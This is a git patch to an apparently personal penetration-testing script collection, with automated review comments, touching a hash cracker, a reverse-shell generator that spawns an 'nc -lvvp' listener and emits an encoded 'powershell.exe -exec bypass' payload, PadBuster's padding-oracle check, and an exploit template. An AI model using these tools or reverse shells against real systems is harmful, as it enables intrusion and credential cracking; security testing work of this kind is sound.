From 718aaa6f6c27f5479e8a7814623474f7d8bf023b Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Mon, 25 Oct 2021 17:25:49 +0200
Subject: [PATCH] Update
---
 crack_hash.py | 4 ++++
 genRevShell.py | 5 ++++-
 padBuster.pl | 2 +-
 template.py | 30 ++++++++++++++----------------
 4 files changed, 23 insertions(+), 18 deletions(-)
 mode change 100644 => 100755 padBuster.pl
diff --git a/crack_hash.py b/crack_hash.py
index 05b16b5..e561a1f 100755
--- a/crack_hash.py
+++ b/crack_hash.py
@@ -33,6 +33,8 @@ class HashType(enum.Enum):
 RAW_SHA2_256 = 1400
 SHA256_PASS_SALT = 1410
 SHA256_SALT_PASS = 1420
+ HMAC_SHA256_PASS = 1450
+ HMAC_SHA256_SALT = 1460
 RAW_SHA2_384 = 10800
 RAW_SHA2_512 = 1700
 SHA512_PASS_SALT = 1710
@@ -181,6 +183,8 @@ class Hash:
 if self.isSalted:
 self.type.append(HashType.SHA256_PASS_SALT)
 self.type.append(HashType.SHA256_SALT_PASS)
+ self.type.append(HashType.HMAC_SHA256_PASS)
+ self.type.append(HashType.HMAC_SHA256_SALT)
 else:
 self.type.append(HashType.RAW_SHA2_256)
 self.type.append(HashType.RAW_SHA3_256)
diff --git a/genRevShell.py b/genRevShell.py
index 519c12c..e5f836f 100755
--- a/genRevShell.py
+++ b/genRevShell.py
@@ -36,13 +36,16 @@ def generatePayload(type, local_address, port):
 payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
 return f"powershell.exe -exec bypass -enc {payload_encoded}"
+def spawn_listener(port):
+ pty.spawn(["nc", "-lvvp", str(port)])
+
 def triggerShell(func, port):
 def _wait_and_exec():
 time.sleep(1.5)
 func()
 threading.Thread(target=_wait_and_exec).start()
- pty.spawn(["nc", "-lvvp", str(port)])
+ spawn_listener(port)
 if __name__ == "__main__":
diff --git a/padBuster.pl b/padBuster.pl
old mode 100644
new mode 100755
index 5be3e3d..1c9a575
--- a/padBuster.pl
+++ b/padBuster.pl
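Review bot: The new HMAC_SHA256_PASS and HMAC_SHA256_SALT members, like the rest of the HashType enum, carry no comment saying what the integers mean; as far as I can tell they are hashcat -m mode numbers, with 1450 keying the HMAC with the password and 1460 with the salt. A one-line comment on the enum such as `# values are hashcat -m mode ids; for HMAC_SHA256_* the suffix names the HMAC key` would save the next reader a lookup. The Hash hunk at line 183 appends the two new types only on the salted branch, which looks consistent with both modes taking a hash:salt input, and the four consecutive `self.type.append(...)` calls there could become a single `self.type.extend([...])`. Both the HashType and the Hash class bodies continue outside their hunks.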
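Review bot: spawn_listener discards the value pty.spawn returns, so triggerShell cannot tell whether the nc child ran or how it exited; `return pty.spawn(["nc", "-lvvp", str(port)])` costs nothing and lets a caller check the status. The new helper also has no docstring; `"""Block in an interactive nc listener on *port* until the peer disconnects."""` would describe it. The `-lvvp` flag set is netcat-variant dependent (it presumably assumes a traditional/GNU-style nc first in PATH), which is worth stating in a comment next to the command. triggerShell's trailing blank line and the `if __name__` block continue outside the hunk.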
@@ -527,7 +527,7 @@ sub processBlock {
 my $continue = "y";
- if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
+ if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
 # This is for autoretry logic (only works on the first byte)
 if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
 $hasHit++;
diff --git a/template.py b/template.py
index 1507594..085d52a 100755
--- a/template.py
+++ b/template.py
@@ -5,36 +5,34 @@ import sys
 def generateTemplate(baseUrl):
 template = """#!/usr/bin/env python
+import os
 import sys
 import json
 import base64
 import requests
+import subprocess
+import urllib.parse
 from bs4 import BeautifulSoup
-from hackingscripts import util, fileserver
+from hackingscripts import util, fileserver, genRevShell
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
-USERNAME = "admin"
-PASSWORD = "password"
-def login(username, password):
- session = requests.Session()
- post_data = { "username": username, "password": password }
- res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False)
- if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
- print("Login failed")
- exit()
- return session
+def request(method, uri, **kwargs):
+ if not uri.startswith("/") and uri != "":
+ uri = "/" + uri
-def exploit(session, payload):
- # Template method to exploit an endpoint
- pass
+ client = requests
+ if "session" in kwargs:
+ client = kwargs["session"]
+ del kwargs["session"]
+
+ return client.request(method, BASE_URL + uri, verify=False, allow_redirects=False, **kwargs)
 if __name__ == "__main__":
- session = login(USERNAME, PASSWORD)
- exploit(session, "id")
+ pass
 """ % baseUrl
 return template
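Review bot: The new `$location !~ /$error/` clause interpolates $error as a regex pattern, so an error string containing `.`, `(` or `?` matches more loosely than intended or dies at runtime on an invalid pattern — the same weakness the existing `$content !~ /$error/` test already has; writing both as `/\Q$error\E/` makes the comparison literal. Where $location is assigned is not visible in this hunk, and if it can be undef the new test emits an "uninitialized value" warning under `use warnings`, which a `defined $location &&` guard or initialising it to "" would avoid. processBlock starts and ends outside the hunk.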
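Review bot: In the generated request() helper, verify=False and allow_redirects=False are passed explicitly next to **kwargs, so a caller that supplies either keyword — e.g. `request("GET", "/", verify=True)` to keep certificate validation on — gets `TypeError: got multiple values for keyword argument` instead of an override. Using kwargs.setdefault keeps the template's defaults while letting a caller override them, and the four-line session handling collapses to `client = kwargs.pop("session", requests)`. generateTemplate is visible in full in this hunk; since the helper lives inside the %-formatted template string, the rewritten lines below deliberately contain no `%` characters.
```python
def request(method, uri, **kwargs):
    if not uri.startswith("/") and uri != "":
        uri = "/" + uri

    # A requests.Session passed as session= is used instead of the module.
    client = kwargs.pop("session", requests)
    # Template defaults; a caller may override either keyword explicitly.
    kwargs.setdefault("verify", False)
    kwargs.setdefault("allow_redirects", False)
    return client.request(method, BASE_URL + uri, **kwargs)
```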